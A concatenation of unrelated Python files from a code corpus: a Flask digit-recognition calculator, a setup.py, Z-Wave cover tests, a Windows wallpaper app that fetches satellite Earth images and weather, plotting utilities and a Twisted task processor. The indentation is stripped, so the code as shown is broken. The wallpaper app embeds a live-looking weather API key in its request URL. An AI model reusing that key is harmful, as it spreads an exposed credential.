h,w=img.shape
cols=np.ones((h,border))*val
tmp=np.concatenate([cols,img,cols],axis=1)
rows=np.ones((border, w+2*border))*val
res=np.concatenate([rows,tmp,rows])
return res
def argsort(lst):
return sorted(range(len(lst)), key=lst.__getitem__)
def extract_img(fname="digit_image.jpg"):
im = cv2.imread(fname)
gray=cv2.cvtColor(im,cv2.COLOR_BGR2GRAY)
gray=255-gray
cv2.imwrite("grayscale.png",gray)
image,contours,hierarchy= cv2.findContours(gray,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)
idx=0
print("No of digits: ", len(contours))
gray2=cv2.imread("grayscale.png")
gray2=cv2.cvtColor(gray2, cv2.COLOR_BGR2GRAY)
c=[ (0,0,255), #red
(0,255,0), #green
(255,0,0),#blue
(255,255,255), #white
(128,128,128), #gray
(0,0,0)#black
]
total=len(contours)
pnt_idxs=argsort([(x,y) for cnt in contours for x,y,w,h in [cv2.boundingRect(cnt)]])
lst=list()
for index,ix in enumerate(pnt_idxs):
x,y,w,h = cv2.boundingRect(contours[ix])
lst.append((x,y,w,h))
idx += 1
#x,y,w,h = cv2.boundingRect(cnt)
roi=gray2[y:y+h,x:x+w]
#cv2.imwrite("tmp.jpg", roi)
#cv2.copyMakeBorder(roi, new_img, borderz, borderz, borderz, borderz, cv2.BORDER_CONSTANT, 255)
new_img=apply_padding(roi, 20, 0)
new_img=255-new_img
cv2.imwrite(str(idx)+".jpg", new_img)
#cv2.rectangle(im,(x,y),(x+20,y+20),c[index],2)
#cv2.imwrite("annotated.jpg", im)
#print("Lst :",lst)
return lst,total
exp=None
@app.route("/", methods=["GET","POST"])
def root():
return render_template("root.html")
def xtract_number():
indices,count=extract_img()
#print("Count: ",count)
ans=list()
for i in range(1,count+1):
ans.append(predict_drawn_img(str(i)+".jpg")[0])
number=int(''.join([str(i) for i in ans]))
#print("Ans: ", ans)
#print(indices)
return number
def is_number(dat):
try:
int(dat)
except:
return False
return True
@app.route("/operator", methods=["GET","POST"])
def operators():
global data
ans=0.0
op=request.json["operator"]
if op=="reset":
data=list()
return json_response({"num":"Draw the number above", "res":0.0}, status_code=200)
elif op=="backspace":
if len(data):
data=data[:-1]
exp=' '.join([str(i) for i in data])
return json_response({"num":exp, "res":ans}, status_code=200)
if data and is_number(data[-1]):
if op=='=':
exp=' '.join([str(i) for i in data+['=']])
ans=solve()
return json_response({"num":exp, "res":ans}, status_code=200)
elif op in ['+', '-', '*','/']:
data.append(op)
exp=' '.join([str(i) for i in data])
return json_response({"num":exp, "res":ans}, status_code=200)
with open("digit_image.jpg",'wb')as f:
f.write(base64.b64decode(request.json["image"].split(',')[1]))
number=xtract_number()
data.append(number)
data.append(op)
exp=' '.join([str(i) for i in data])
if op=='=':
data=data[:-1]
ans=solve()
return json_response({"num":exp, "res":ans}, status_code=200)
def solve():
global data
print(data)
total=data[0]
for index in range(1,len(data),2):
op=data[index]
if op=='+':
total+=data[index+1]
elif op=='-':
total-=data[index+1]
elif op=='*':
total*=data[index+1]
elif op=='/':
total/=data[index+1]
data=list()
print("Total= ", total)
return total
if __name__ == "__main__":
app.secret_key = os.urandom(12)
app.run(debug=False, host='0.0.0.0', port=31456)
| StarcoderdataPython |
84236 | <reponame>dHannasch/python-packaging-test-bed<gh_stars>0
import setuptools
import os.path
import sphinx.setup_command
# To build the documentation: python setup.py build_sphinx
# To install this package: $ pip install --requirement ./requirements.txt --editable .
# To run the tests: $ python setup.py test or pytest
projectName = 'my-hyphenated-package'
packageData = dict()
packageData[projectName] = ['data/*.json']
versionString = '0.1'
minorVersionString = '0.1.0'
def getREADMEforDescription(readmePath=os.path.join(os.path.abspath(os.path.dirname(__file__)), 'README.md')):
"""Use the Markdown from the file for the package's long_description.
long_description_content_type should be 'text/markdown' in this case.
This is why we need the README to be in the MANIFEST.in file.
"""
try:
with open(readmePath) as readme:
return '\n' + readme.read()
except FileNotFoundError:
return 'Package for fuzzing.'
if __name__ == '__main__':
setuptools.setup(name=projectName,
version=versionString,
description='Package description.',
long_description=getREADMEforDescription(),
long_description_content_type='text/markdown',
license='MIT',
cmdclass={'build_sphinx': sphinx.setup_command.BuildDoc},
command_options={
'build_sphinx': {
'project': ('setup.py', projectName),
'version': ('setup.py', versionString),
'release': ('setup.py', minorVersionString),
'source_dir': ('setup.py', os.path.join('doc', 'source'))}},
packages=setuptools.find_packages(),
package_data=packageData,
install_requires=[
],
setup_requires=[
'pytest-runner',
],
tests_require=['pytest'],
zip_safe=True)
| StarcoderdataPython |
52316 | import os
from aztk.models.plugins.plugin_configuration import PluginConfiguration, PluginPort, PluginTargetRole
from aztk.models.plugins.plugin_file import PluginFile
dir_path = os.path.dirname(os.path.realpath(__file__))
class SparkUIProxyPlugin(PluginConfiguration):
def __init__(self):
super().__init__(
name="spark_ui_proxy",
ports=[PluginPort(internal=9999, public=True)],
target_role=PluginTargetRole.Master,
execute="spark_ui_proxy.sh",
args=["localhost:8080", "9999"],
files=[
PluginFile("spark_ui_proxy.sh", os.path.join(dir_path, "spark_ui_proxy.sh")),
PluginFile("spark_ui_proxy.py", os.path.join(dir_path, "spark_ui_proxy.py")),
],
)
| StarcoderdataPython |
3225814 | <filename>tests/components/ozw/test_cover.py
"""Test Z-Wave Covers."""
from openpeerpower.components.cover import ATTR_CURRENT_POSITION
from openpeerpower.components.ozw.cover import VALUE_SELECTED_ID
from .common import setup_ozw
VALUE_ID = "Value"
async def test_cover(opp, cover_data, sent_messages, cover_msg):
"""Test setting up config entry."""
receive_message = await setup_ozw(opp, fixture=cover_data)
# Test loaded
state = opp.states.get("cover.roller_shutter_3_instance_1_level")
assert state is not None
assert state.state == "closed"
assert state.attributes[ATTR_CURRENT_POSITION] == 0
# Test setting position
await opp.services.async_call(
"cover",
"set_cover_position",
{"entity_id": "cover.roller_shutter_3_instance_1_level", "position": 50},
blocking=True,
)
assert len(sent_messages) == 1
msg = sent_messages[0]
assert msg["topic"] == "OpenZWave/1/command/setvalue/"
assert msg["payload"] == {"Value": 50, "ValueIDKey": 625573905}
# Feedback on state
cover_msg.decode()
cover_msg.payload["Value"] = 50
cover_msg.encode()
receive_message(cover_msg)
await opp.async_block_till_done()
# Test opening
await opp.services.async_call(
"cover",
"open_cover",
{"entity_id": "cover.roller_shutter_3_instance_1_level"},
blocking=True,
)
assert len(sent_messages) == 2
msg = sent_messages[1]
assert msg["topic"] == "OpenZWave/1/command/setvalue/"
assert msg["payload"] == {"Value": True, "ValueIDKey": 281475602284568}
# Test stopping after opening
await opp.services.async_call(
"cover",
"stop_cover",
{"entity_id": "cover.roller_shutter_3_instance_1_level"},
blocking=True,
)
assert len(sent_messages) == 4
msg = sent_messages[2]
assert msg["topic"] == "OpenZWave/1/command/setvalue/"
assert msg["payload"] == {"Value": False, "ValueIDKey": 281475602284568}
msg = sent_messages[3]
assert msg["topic"] == "OpenZWave/1/command/setvalue/"
assert msg["payload"] == {"Value": False, "ValueIDKey": 562950578995224}
# Test closing
await opp.services.async_call(
"cover",
"close_cover",
{"entity_id": "cover.roller_shutter_3_instance_1_level"},
blocking=True,
)
assert len(sent_messages) == 5
msg = sent_messages[4]
assert msg["topic"] == "OpenZWave/1/command/setvalue/"
assert msg["payload"] == {"Value": True, "ValueIDKey": 562950578995224}
# Test stopping after closing
await opp.services.async_call(
"cover",
"stop_cover",
{"entity_id": "cover.roller_shutter_3_instance_1_level"},
blocking=True,
)
assert len(sent_messages) == 7
msg = sent_messages[5]
assert msg["topic"] == "OpenZWave/1/command/setvalue/"
assert msg["payload"] == {"Value": False, "ValueIDKey": 281475602284568}
msg = sent_messages[6]
assert msg["topic"] == "OpenZWave/1/command/setvalue/"
assert msg["payload"] == {"Value": False, "ValueIDKey": 562950578995224}
# Test stopping after no open/close
await opp.services.async_call(
"cover",
"stop_cover",
{"entity_id": "cover.roller_shutter_3_instance_1_level"},
blocking=True,
)
# both stop open/close messages sent
assert len(sent_messages) == 9
msg = sent_messages[7]
assert msg["topic"] == "OpenZWave/1/command/setvalue/"
assert msg["payload"] == {"Value": False, "ValueIDKey": 281475602284568}
msg = sent_messages[8]
assert msg["topic"] == "OpenZWave/1/command/setvalue/"
assert msg["payload"] == {"Value": False, "ValueIDKey": 562950578995224}
# Test converting position to zwave range for position > 0
await opp.services.async_call(
"cover",
"set_cover_position",
{"entity_id": "cover.roller_shutter_3_instance_1_level", "position": 100},
blocking=True,
)
assert len(sent_messages) == 10
msg = sent_messages[9]
assert msg["topic"] == "OpenZWave/1/command/setvalue/"
assert msg["payload"] == {"Value": 99, "ValueIDKey": 625573905}
# Test converting position to zwave range for position = 0
await opp.services.async_call(
"cover",
"set_cover_position",
{"entity_id": "cover.roller_shutter_3_instance_1_level", "position": 0},
blocking=True,
)
assert len(sent_messages) == 11
msg = sent_messages[10]
assert msg["topic"] == "OpenZWave/1/command/setvalue/"
assert msg["payload"] == {"Value": 0, "ValueIDKey": 625573905}
async def test_barrier(opp, cover_gdo_data, sent_messages, cover_gdo_msg):
"""Test setting up config entry."""
receive_message = await setup_ozw(opp, fixture=cover_gdo_data)
# Test loaded
state = opp.states.get("cover.gd00z_4_barrier_state")
assert state is not None
assert state.state == "closed"
# Test opening
await opp.services.async_call(
"cover",
"open_cover",
{"entity_id": "cover.gd00z_4_barrier_state"},
blocking=True,
)
assert len(sent_messages) == 1
msg = sent_messages[0]
assert msg["topic"] == "OpenZWave/1/command/setvalue/"
assert msg["payload"] == {"Value": 4, "ValueIDKey": 281475083239444}
# Feedback on state
cover_gdo_msg.decode()
cover_gdo_msg.payload[VALUE_ID][VALUE_SELECTED_ID] = 4
cover_gdo_msg.encode()
receive_message(cover_gdo_msg)
await opp.async_block_till_done()
state = opp.states.get("cover.gd00z_4_barrier_state")
assert state is not None
assert state.state == "open"
# Test closing
await opp.services.async_call(
"cover",
"close_cover",
{"entity_id": "cover.gd00z_4_barrier_state"},
blocking=True,
)
assert len(sent_messages) == 2
msg = sent_messages[1]
assert msg["topic"] == "OpenZWave/1/command/setvalue/"
assert msg["payload"] == {"Value": 0, "ValueIDKey": 281475083239444}
| StarcoderdataPython |
82633 | <reponame>Soulter/SoEarth---a-real-time-Earth-Wallpaper<filename>main.py<gh_stars>1-10
# -*- coding:UTF-8 -*-
from PIL import Image,ImageFont,ImageDraw
import requests
import urllib
import urllib.request
import win32api,win32con,win32gui
import json
import os
import time,datetime,threading
from tkinter import Button,Tk,PhotoImage,Label,Text
import tkinter.messagebox
#http://himawari8-dl.nict.go.jp/himawari8/img/D531106/1d/550/2019/01/05/131000_0_0.png
# TIMEDATA_URL = "http://himawari8-dl.nict.go.jp/himawari8/img/D531106/latest.json" THE PAGE IS NOT AVAILABLE
TIMEDATA_URL = "https://himawari8.nict.go.jp/img/FULL_24h/latest.json"
# EARTH_URL = "http://himawari8-dl.nict.go.jp/himawari8/img/D531106/1d/550/{}/{}/{}/{}_0_0.png"
EARTH_URL = "https://himawari8.nict.go.jp/img/D531106/1d/550/{}/{}/{}/{}_0_0.png"
WTER_URL = "http://api.yytianqi.com/observe?city=CH010100&key=mu1lfn6pa8nibus8"
HITOKOTO_URL = "https://v1.hitokoto.cn"
tag = 0
get_earth_tag = 0
latest_earth_file_path = ""
def text_display(strs):
text1.insert(1.0,strs+"\n")
top.update()
def read_url(url_ok):
"""
读取解析网址
"""
web_html = ""
try :
web_html=urllib.request.urlopen(url_ok).read().decode('utf-8')
except BaseException:
text_display("error: reading url: "+url_ok)
return web_html
def get_json(html):
"""
将得到的信息解析为json格式
"""
web_json = {}
try :
web_json=json.loads(html)
except BaseException:
text_display("error: parsing to json: "+html)
return web_json
def url_provider(timedata,earthurl):
earth_time = timedata.get("date")
print(earth_time)
year = earth_time[0:4]
month = earth_time[5:7]
day = earth_time[8:10]
hms = str(earth_time[11:13]+earth_time[14:16]+earth_time[17:19])
time_name = year+month+day+hms
url = earthurl.format(year,month,day,hms)
return url,time_name
def img_get(img_url,time_name):
img = requests.get(img_url)
f = open(time_name+".png",'ab')
f.write(img.content)
f.close()
print("保存Pic:"+time_name+".png")
return img
def img_edit(img,time_name,timedata,wterdata,hitokoto_json):
#新建一个背景图层,其分辨率符合用户桌面分辨率,然后将重合两个图片
screenX = win32api.GetSystemMetrics(win32con.SM_CXSCREEN)
screenY = win32api.GetSystemMetrics(win32con.SM_CYSCREEN)
bg_img = Image.new('RGBA', (screenX,screenY), (0,0,0,255))#新建壁纸背景
earth_img = Image.open(time_name+".png")#打开得到的地球图片
bg_img.paste(earth_img,(screenX//2-550//2,screenY//2-550//2))#重合
logo = Image.open('logo.png')
bg_img.paste(logo,(screenX-250,screenY//2))
# 时间转换,进行加8小时,得到东八区区时
# 将str格式的时间转换为datetime格式
chinaTime = datetime.datetime.strptime(timedata.get('date'), '%Y-%m-%d %H:%M:%S')
# 将datetime格式的时间转换成时间戳格式,再加上八小时的毫秒数
chinaTime = int(time.mktime(chinaTime.timetuple())) + 8 * 60 * 60
# 时间戳转为datetime
chinaTime = datetime.datetime.fromtimestamp(chinaTime)
text_display("零时区的时间:"+timedata.get('date'))
text_display("东八区区时:"+str(chinaTime))
hitokoto_str = hitokoto_json.get("hitokoto") + " ——" + hitokoto_json.get("from")
fontFolder = r'C:\Windows\Fonts'
# fontFolder = r'\\'
blackFont1 = ImageFont.truetype(os.path.join(fontFolder, 'msyh.ttc'), size=20)
blackFont2 = ImageFont.truetype(os.path.join(fontFolder, 'msyh.ttc'), size=90)
blackFont3 = ImageFont.truetype(os.path.join(fontFolder, 'msyh.ttc'), size=30)
blackFont80 = ImageFont.truetype(os.path.join(fontFolder, 'msyh.ttc'), size=80)
# blackFont1 = ImageFont.truetype(os.path.join(fontFolder, 'DENGGB.TTF'), size=20)
# blackFont2 = ImageFont.truetype(os.path.join(fontFolder, 'DENGGB.TTF'), size=90)
# blackFont3 = ImageFont.truetype(os.path.join(fontFolder, 'DENGGB.TTF'), size=30)
# blackFont80 = ImageFont.truetype(os.path.join(fontFolder, 'DENGGB.TTF'), size=80)
tx_time = ImageDraw.Draw(bg_img)
tx_time.text((screenX-250+12,screenY//2+55), str(chinaTime), fill='white', font=blackFont1)
try :
tx_wter_qw = ImageDraw.Draw(bg_img)
tx_wter_du = ImageDraw.Draw(bg_img)
tx_wter_tq = ImageDraw.Draw(bg_img)
tx_wter_ct = ImageDraw.Draw(bg_img)
wter_qw = str(wterdata.get('data').get('qw'))
tx_hitokoto = ImageDraw.Draw(bg_img)
# wter_tq = int(str(wterdata.get('data').get('numtq')))
# print(wter_tq)
#
# if wter_tq == 2:
# tqlogo = Image.open('02.png')
# bg_img.paste(tqlogo, (screenX - 500, screenY // 2))
#90大小的最优间隔 65px,所以就有了下面三行的位置的算法
# tx_wter_qw.text((screenX - 250 + 12, screenY -650), wter_qw, fill='white', font=blackFont2)
# tx_wter_du.text((screenX - 250 + len(wter_qw)*65, screenY - 630), "°", fill='white',font=blackFont3)
# tx_wter_tq.text((screenX - 250 + len(wter_qw)*65, screenY - 587), str(wterdata.get('data').get('tq')), fill='white', font=blackFont3)
# tx_wter_ct.text((screenX - 250 + 16, screenY - 540), "桂林市", fill='white', font=blackFont1)
tx_wter_qw.text((screenX * 0.84 , screenY * 0.2), wter_qw, fill='white', font=blackFont2)
tx_wter_du.text((screenX * 0.92, screenY * 0.22), "°", fill='white', font=blackFont3)
tx_wter_tq.text((screenX * 0.92, screenY * 0.313), str(wterdata.get('data').get('tq')),
fill='white', font=blackFont3)
tx_wter_ct.text((screenX * 0.843, screenY * 0.323), "北京市", fill='white', font=blackFont1)
tx_hitokoto.text((screenX * 0.5 - 10*len(hitokoto_str), screenY * 0.08), hitokoto_str, fill='white', font=blackFont1)
except AttributeError:
text_display("获取天气集合失败,也许是没Money了...")
bg_img.save('bg_img.bmp')
def wallpaperSet():
k = win32api.RegOpenKeyEx(win32con.HKEY_CURRENT_USER, "Control Panel\\Desktop", 0, win32con.KEY_SET_VALUE)
win32api.RegSetValueEx(k, "WallpaperStyle", 0, win32con.REG_SZ, "2")
win32api.RegSetValueEx(k, "TileWallpaper", 0, win32con.REG_SZ, "0")
win32gui.SystemParametersInfo(win32con.SPI_SETDESKWALLPAPER, os.getcwd() + r'\bg_img.bmp',1 + 2) # os.getcwd()返回此文件所在目录
def startCallBack():
global tag
tag = 0
t = threading.Thread(target=starting, name='StartingThread')
t.setDaemon(True)
t.start()
def endCallBack():
global tag
tag = 1
tkinter.messagebox.showinfo("操作状态", "执行成功!")
def infoCallBack():
tkinter.messagebox.showinfo("关于...", "地球日记 By:Soulter \n QQ:905617992 \n如何设置自启动? 将本程序放入Windows的'启动'文件夹中" )
def diyBtnCallBack():
diySettingsWindow = Tk()
l1 = tkinter.Label(diySettingsWindow, text='目标网址(目前仅支持json)', bg='green', width=30, height=2)
apiInput = tkinter.Entry(diySettingsWindow)
l2 = tkinter.Label(diySettingsWindow, text='更新频率(毫秒ms)', bg='green', width=30, height=2)
ctimeInput = tkinter.Entry(diySettingsWindow)
l3 = tkinter.Label(diySettingsWindow, text='坐标x', bg='green', width=30, height=2)
posxInput = tkinter.Entry(diySettingsWindow)
l4 = tkinter.Label(diySettingsWindow, text='坐标y', bg='green', width=30, height=2)
posyInput = tkinter.Entry(diySettingsWindow)
l5 = tkinter.Label(diySettingsWindow, text='键', bg='green', width=30, height=2)
target_arg = tkinter.Entry(diySettingsWindow)
# btn = Button(diySettingsWindow, text="确定", command=lambda: dsw_set_diy_style(apiInput.get(), ctimeInput.get(), posxInput.get(), posyInput.get(), target_arg.get()))
l1.pack()
apiInput.pack()
l2.pack()
ctimeInput.pack()
l3.pack()
posxInput.pack()
l4.pack()
posyInput.pack()
l5.pack()
target_arg.pack()
# btn.pack()
diySettingsWindow.mainloop()
def dsw_parsingApiCallback(url):
html = read_url(url)
print(html)
def starting():
while 1:
global tag
if tag == 1:
print("STOP...")
break
text_display(
"-------------------------\n作者:Soulter QQ:905617992\ngithub.com/soulter\n-------------------------")
timedata_html = read_url(TIMEDATA_URL)
timedata_json = get_json(timedata_html)
wterdata_html = read_url(WTER_URL)
wterdata_json = get_json(wterdata_html)
hitokoto_html = read_url(HITOKOTO_URL)
hitokoto_json = get_json(hitokoto_html)
text_display("得到时间数据文件:" + str(timedata_json))
text_display("得到文件city=25.266443,110.157113 天气:" + str(wterdata_json))
# global get_earth_tag
url, time_name = url_provider(timedata_json, EARTH_URL)
# latest_earth_file_path = time_name
img = img_get(url, time_name)
img_edit(img, time_name, timedata_json, wterdata_json, hitokoto_json)
get_earth_tag = 0
# Set Windows Wallpaper
wallpaperSet()
text_display("sleep5分钟-v-!!!")
time.sleep(5 * 60)
top = Tk()
get_earth_tag = 0
text1 = Text(top,width=50,height=20)
text1.insert(1.0, "Waiting your order:)")
text1.pack()
top.title("地球日记 | EarthDiary")
top.iconbitmap('mainlogo.ico')
B = Button(top, text ="运行", command=startCallBack)
B2 = Button(top, text ="停止", command=endCallBack)
B3 = Button(top, text ="关于作者...", command=infoCallBack)
# textInput = tkinter.Entry(top)
diyBtn = Button(top, text= "个性化(beta)", command=diyBtnCallBack)
# photo=PhotoImage(file="guibg.gif")
# label=Label(top,image=photo) #图片
# label.pack()
B.pack()
B2.pack()
B3.pack()
# textInput.pack()
diyBtn.pack()
top.mainloop()
| StarcoderdataPython |
136261 | <gh_stars>0
import itertools
import openmdao.api as om
from openaerostruct.aerodynamics.control_surfaces import ControlSurface
def _pairwise(iterable): # From itertools recipes
"s -> (s0,s1), (s1,s2), (s2, s3), ..."
a, b = itertools.tee(iterable)
next(b, None)
return zip(a, b)
class ControlSurfacesGroup(om.Group):
""" A collection of control surfaces generated from a list of dictionaries"""
def initialize(self):
self.options.declare('control_surfaces', types=list)
self.options.declare('mesh')
def setup(self):
control_surfaces = self.options['control_surfaces']
# Add control surfaces as subsystems
for control_surface in control_surfaces:
control_surface_component = ControlSurface(mesh=self.options['mesh'], **control_surface)
self.add_subsystem(control_surface['name'], control_surface_component)
# Connect control surfaces
self.promotes(control_surfaces[0]['name'], inputs=['undeflected_normals'])
for surf1, surf2 in _pairwise(control_surfaces):
self.connect(surf1['name']+'.deflected_normals',
surf2['name']+'.undeflected_normals')
self.promotes(control_surfaces[-1]['name'], outputs=['deflected_normals'])
# Promote def_mesh for all surfaces
for surf in control_surfaces:
self.promotes(surf['name'], inputs=['def_mesh'])
if __name__ =='__main__':
import numpy as np
from openaerostruct.geometry.utils import generate_mesh
# Based on NACA TN2563
# Brief description
S = 2*0.092903
AR = 8
b = np.sqrt(S*AR)
taper = 0.45
rc = 2*S/(b*(taper+1))
tc = rc*taper
sweep = 46 # from LE
cg_loc = np.array([0.38*rc,0,0])
# Testing conditions
alpha = 0.012 # From Kirsten Wind Tunnel page
rho = 1.2
n = 4
num_y = n*(10)+1
num_x = 7
# Create a dictionary to store options about the surface
mesh_dict = {'num_y' : num_y,
'num_x' : num_x,
'wing_type' : 'rect',
'symmetry' : False,
'span' : b,
'root_chord' : rc}
mesh = generate_mesh(mesh_dict)
control_surfaces = [
{
'name': 'ail0'+str(ind[1]),
'yLoc': list(ind),
'cLoc': [0.7, 0.7], #All ailerons are 0.3c
'antisymmetric': True,
'corrector': True
} for ind in _pairwise([0, 2, 4, 6, 8])]
csg = ControlSurfacesGroup(control_surfaces=control_surfaces, mesh=mesh)
p = om.Problem()
p.model.add_subsystem('control_surfaces', csg)
p.setup()
p.final_setup()
| StarcoderdataPython |
4838599 | <reponame>ihsuy/Train-by-Reconnect<filename>train_by_reconnect/viz_utils.py<gh_stars>1-10
import textwrap
import math
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.patches import ConnectionPatch
def Profiler(model, nrows=None, ncols=None, skip_1d=True, path=None, wrapwidth=30):
"""Plot weight profiles for trainable_variables of model.
Args:
model - (tensorflow.keras.Sequential) - the model to be plotted.
nrows - (int) - number of rows
ncols - (int) - number of columns
skip_1d - (boolean) - whether to skip trainable_variable
with number of dimension equals to 1, e.g., biases.
path - (str) - save plotted image to path.
wrapwidth - (int) - width for textwrap.wrap.
"""
w = [var.numpy() for var in model.trainable_variables]
names = [var.name for var in model.trainable_variables]
plottable = []
plot_names = []
dim_lim = 0 if not skip_1d else 1
for i, item in enumerate(w):
if item.ndim > dim_lim and item.shape[-1] > dim_lim:
plottable.append(item)
plot_names.append(names[i])
n = len(plottable)
if nrows is None or ncols is None:
ncols = math.ceil(math.sqrt(n))
nrows = math.ceil(n/ncols)
print("Plotting {} items\nUsing grid of size {} x {}".format(n, nrows, ncols))
fig, axes = plt.subplots(nrows=nrows, ncols=ncols,
figsize=(ncols*3*1.5, nrows*2*1.5))
for r in range(nrows):
for c in range(ncols):
index = r*ncols+c
if index >= n:
if nrows == 1:
if ncols == 1:
axes.set_axis_off()
else:
axes[c].set_axis_off()
else:
axes[r][c].set_axis_off()
continue
data = plottable[index]
ndim = data.ndim
if ndim == 4:
data = data.reshape((np.prod(data.shape[:3]), data.shape[3]))
data = np.sort(data, axis=0)
title = plot_names[index]+" {}".format(data.shape)
title = '\n'.join(textwrap.wrap(title, wrapwidth))
if nrows == 1:
if ncols == 1:
axes.plot(data)
axes.set_title(title)
else:
axes[c].plot(data)
axes[c].set_title(title)
else:
axes[r][c].plot(data)
axes[r][c].set_title(title)
plt.tight_layout()
if path is None:
plt.show()
else:
plt.savefig(path, format='png')
def PermutationTracer(A, B, figsize=(15, 15), arrow_alpha=1, max_rad=0.2, on_self=False,
diff_only=True, cmap=None):
""" Given 2 matrices A and B, where B can be obtained by permuting the entries of A
This method connects pixels of the same values between two matrixes.
Args:
arrow_alpha - (float) Transparency of arrows
max_rad - (float) Maximum arrow curvature
on_self - (boolean) - Whether show permutation on the left hand side image only.
diff_only - (boolean) - whether connects pixels that changed in locations.
"""
shapeA = A.shape
shapeB = B.shape
assert shapeA == shapeB, "A and B must have the same shapes."
A = A.ravel()
B = B.ravel()
ranker, locator, mapper = {}, {}, {}
argB = np.argsort(B)
rankB = np.argsort(argB)
for val, rank in zip(B, rankB):
ranker[val] = rank
for loc, arg in enumerate(argB):
locator[loc] = arg
for i in range(len(A)):
mapper[i] = locator[ranker[A[i]]]
A = A.reshape(shapeA)
B = B.reshape(shapeB)
# Plot
fig = plt.figure(figsize=figsize)
if not on_self:
ax1 = fig.add_subplot(221)
ax2 = fig.add_subplot(224)
else:
ax1 = fig.add_subplot(121)
ax2 = fig.add_subplot(122)
ax1.matshow(A, cmap=cmap)
ax2.matshow(B, cmap=cmap)
ax1.axis('off')
ax2.axis('off')
# Connect pixels
for i in range(shapeA[0]):
for j in range(shapeA[1]):
index = i*shapeA[1] + j
indexB = mapper[index]
if diff_only and index == indexB:
continue
xyA = (indexB % shapeA[1], indexB//shapeA[1])
xyB = (j, i)
axesA = ax2
axesB = ax1
if on_self:
axesB = ax1
axesA = ax1
con = ConnectionPatch(xyA=xyA, xyB=xyB,
coordsA="data", coordsB="data",
axesA=axesA, axesB=axesB,
color='turquoise' if np.random.randint(
2) else 'darkorange',
linewidth=2,
arrowstyle='<-',
connectionstyle="arc3,rad={}".format(
np.random.uniform(-max_rad, max_rad)),
alpha=arrow_alpha)
if on_self:
ax1.add_artist(con)
else:
ax2.add_artist(con)
| StarcoderdataPython |
1642393 | <filename>random-commander-app.py<gh_stars>0
from app import app
import os
if __name__ == '__main__':
port = os.getenv('VCAP_APP_PORT', '8080')
print('Running On Port: ' + str(port))
app.run(debug=True, host='0.0.0.0', port=port) | StarcoderdataPython |
1765774 | <reponame>sugarsack/sugar
# coding: utf-8
"""
Task processing daemon.
"""
import time
from twisted.internet import reactor, threads
from twisted.internet import task as twisted_task
import twisted.internet.error
from sugar.lib.compat import yaml
from sugar.lib.logger.manager import get_logger
from sugar.lib.compiler.objtask import FunctionObject
from sugar.lib.perq import QueueFactory
from sugar.lib.perq.qexc import QueueEmpty
from sugar.transport import RunnerModulesMsgFactory, ObjectGate
class TaskProcessor:
"""
Concurrent task processor.
"""
XLOG_PATH = "/var/cache/sugar/client/tasks"
XRET_PATH = "/var/cache/sugar/client/responses"
def __init__(self, loader):
self.t_counter = 0
self.log = get_logger(self)
self.loader = loader
self._queue = QueueFactory.fs_queue(self.XLOG_PATH).use_notify()
self._ret_queue = QueueFactory.fs_queue(self.XRET_PATH).use_notify()
self._d_stop = False
self._task_looper_marker = True
def on_task(self, task: FunctionObject) -> (str, dict):
"""
Process a single task. This is either a task from the state sequence or one-shot runner command.
Runner URI must have a prefix "runner:" to it.
:param task: FunctionObject
:raises NotImplementedError: if state is called
:return dict: result data
"""
# Todo: probably not FunctionObject, but StateTask *and* FunctionObject.
self.log.debug("Running task: {}. JID: {}", task, task.jid)
# TODO: Send message back informing for accepting the task
uri = "{}.{}".format(task.module, task.function)
task_source = {
"command": {
uri: []
}
}
if task.args:
task_source["command"][uri].append(task.args)
if task.kwargs:
task_source["command"][uri].append(task.kwargs)
if task.type == FunctionObject.TYPE_RUNNER:
response = RunnerModulesMsgFactory.create(jid=task.jid, task=task, src=yaml.dump(task_source))
try:
self.loader.runners[response.uri](*task.args, **task.kwargs).set_run_response(response)
except Exception as exc:
response.errmsg = "Error running task '{}.{}': {}".format(task.module, task.function, str(exc))
self.log.error(response.errmsg)
self._ret_queue.put_nowait(ObjectGate(response).pack(binary=True))
else:
raise NotImplementedError("State running is not implemented yet")
return task.jid, response
def on_task_result(self, result: tuple) -> None:
"""
Store task results to the returner facility.
:param result: Resulting data from the performed task, which is a tuple of "(jid, result)".
:return: None
"""
jid, response = result
self.log.debug("Task return: {}. JID: {}", response.return_data, jid)
# Decrease tasks counter
if self.t_counter:
self.t_counter -= 1
# [Re]fire deferred stop.
# This will occur only if deferred_stop() has been once fired
# from the outside. Otherwise this process will keep running.
if self._d_stop:
self.deferred_stop()
def deferred_stop(self) -> None:
"""
Fire worker's deferred stop, which will stop
this process only after all tasks are finished.
:return: None
"""
if not self._d_stop:
self._d_stop = True
if not self.t_counter:
self.log.info("Task processor shut down")
try:
reactor.stop()
except twisted.internet.error.ReactorNotRunning:
self.log.debug("Reactor is no longer running")
def next_task(self) -> None:
"""
Cycle the next task.
:return: None
"""
task = None
while task is None:
try:
task = self._queue.get(force=self._task_looper_marker) # If any old lock still there
self._task_looper_marker = False
except QueueEmpty:
self.log.debug("Skipping concurrent notification: task already taken")
time.sleep(1)
self.log.info("Processing task")
threads.deferToThread(self.on_task, task).addCallback(self.on_task_result)
self.t_counter += 1
while True:
try:
task = self._queue.get_nowait()
threads.deferToThread(self.on_task, task).addCallback(self.on_task_result)
self.t_counter += 1
except QueueEmpty:
self.log.debug("No more tasks")
break
def schedule_task(self, task) -> None:
"""
Schedule task.
:param task: Task to schedule
:return: None
"""
self._queue.put(task)
def get_response(self, force: bool):
"""
Get response.
:param force or not the first get (removes disk lock)
:return: A response payload
"""
return self._ret_queue.get_nowait(force=force) if not self._ret_queue.pending() else None
def run(self) -> None:
"""
Run task processor.
:return: None
"""
self.log.info("Task processor start")
twisted_task.LoopingCall(self.next_task).start(0.1)
reactor.run()
self.log.info("Processor stopped")
| StarcoderdataPython |
3320542 | # Tensorboard writer
import os
import torch
import numpy as np
from tensorboardX import SummaryWriter
class TensorboardWriter():
''' Tensorboard Writer '''
def __init__(self, log_dir=None):
self.log_dir = log_dir
self.writer = SummaryWriter(log_dir=log_dir)
def write(self, result, n_iter):
for metric in result:
self.writer.add_scalar(metric, result[metric], n_iter)
def export(self):
json_path = os.path.join(self.log_dir, 'results.json')
self.writer.export_scalars_to_json(json_path)
def close(self):
self.writer.close()
| StarcoderdataPython |
102364 | <filename>src/open_sea/__init__.py
from .open_sea import OpenSea | StarcoderdataPython |
36156 | <filename>pysnmp/ALVARION-SMI.py
#
# PySNMP MIB module ALVARION-SMI (http://snmplabs.com/pysmi)
